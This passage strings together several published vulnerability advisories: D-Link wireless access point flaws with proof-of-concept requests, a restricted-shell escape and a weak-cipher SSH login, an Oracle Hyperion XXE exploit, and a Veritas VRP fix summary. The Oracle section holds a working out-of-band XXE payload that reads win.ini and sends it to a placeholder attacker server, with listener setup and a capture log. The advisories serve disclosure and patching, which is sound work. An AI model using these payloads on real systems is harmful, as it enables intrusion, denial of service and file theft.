CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu
OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp
wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC
I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW
2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK
YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N
29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B
AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS
7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME
9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5
beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE
45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef
MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==
-----END CERTIFICATE-----

### 3.  Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept
   kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC]  URL

Retrieve files via HTTP or FTP

Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')

DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.

DLINK-WLAN-AP# help

## Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this
Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

- Exploit Title: XXE Injection Oracle Hyperion 
- Exploit Author: Lucas Dinucci (idntk.lucdin@gmail.com)
- Twitter: @identik1t
- Vendor Homepage: https://www.oracle.com/applications/performance-management
- Date: 02/11/2019
- Affected Product: Oracle Hyperion Enterprise Performance Management System
- Version: 11.1.2.3
- CVE: CVE-2019-2861
- Patch: https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
- Vulnerability Type: https://cwe.mitre.org/data/definitions/611.html


# XML External Entity (XXE) Injection 


The event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo parameters are prone to XXE injection. An authenticated attacker could exploit this vulnerability to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution and denial of service attacks.

Path: http://host:19000/calcmgr/faces/cmshell?_adf.ctrl-state=i38w0cig2_4

Parameters: event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo (POST REQUEST)


# Proof-of-concept


1 - Create a file and name it as xxe_poc with the following content, replacing with your server address:


<!ENTITY % payload SYSTEM "file:///c:\\Windows\\win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; external SYSTEM 'http://your_server_address/log_xxe?data=%payload;'>">


2 - Start a webserver to receive the connection, such as:


sudo python -m SimpleHTTPServer 80


3 - Place the following payload in one of the vulnerable parameters, replacing with your server address:


<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://your_server_address/xxe_poc"> %pe; %param1; %external;]><m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>


4 - Data retrivial:

Serving HTTP on 0.0.0.0 port 8000 ...

192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /xxe_poc HTTP/1.1" 200 -

192.168.13.1 - - [11/Feb/2019 04:59:47] code 404, message File not found

192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /log?data=; HTTP/1.1" 200 -;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files] HTTP/1.1" 400 -

Four vulnerabilities have been fixed in VRP 3.4 HF1, one of which is of critical severity.

Directory traversal vulnerability related to uploading application bundles
CVE-2019-14415
Critical severity

Arbitrary command execution vulnerability with root privilege related to DNS server configuration
CVE-2019-14416
High severity

Arbitrary command execution vulnerability with root privilege related to resiliency plans and custom scripts
CVE-2019-14417
High severity

A persistent cross-site scripting (XSS) vulnerability allows a malicious VRP user to inject malicious script into another user's browser, related to resiliency plans functionality.
CVE-2019-14418
Medium severity

https://www.veritas.com/content/support/en_US/security/VTS19-002.html